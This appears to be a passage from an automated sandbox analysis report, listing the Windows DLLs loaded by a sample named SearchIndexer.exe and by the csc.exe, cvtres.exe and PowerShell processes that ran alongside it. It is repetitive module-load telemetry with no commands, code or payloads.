Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
